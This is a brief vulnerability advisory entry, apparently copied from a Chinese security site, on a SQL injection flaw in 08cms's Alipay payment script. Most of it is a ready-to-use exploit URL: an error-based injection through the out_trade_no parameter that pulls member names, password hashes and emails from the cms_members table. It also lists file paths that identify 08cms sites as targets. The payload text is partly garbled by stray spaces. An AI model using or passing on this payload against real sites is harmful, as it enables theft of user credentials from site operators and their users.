08cms pay injection vulnerability-vulnerability warning-the black bar safety net

2014-02-08T00:00:00
ID MYHACK58:62201442254
Type myhack58
Reporter 佚名
Modified 2014-02-08T00:00:00

Description

漏洞 也 include/paygate/alipay/pays.php

Directly on the Exp

/include/paygate/alipay/pays. php? out_trade_no=2 2'%20AND%2 0(SELECT%2 0 1%20FROM(SELECT%20COUNT(*),CONCAT

((SELECT%20concat(0x3a,mname,0x3a,password,0x3a,email,0x3a)%20from%20cms_members

%20limit%200,1),FLOOR(RAND(0)*2))X%20FROM%20information_schema. tables%20GROUP%2 0

BY%20X)a)%20AND'

08cms fingerprint feature, you know.

/include/js/_08cms. js|08cms

/include/js/floatwin. js|08CMS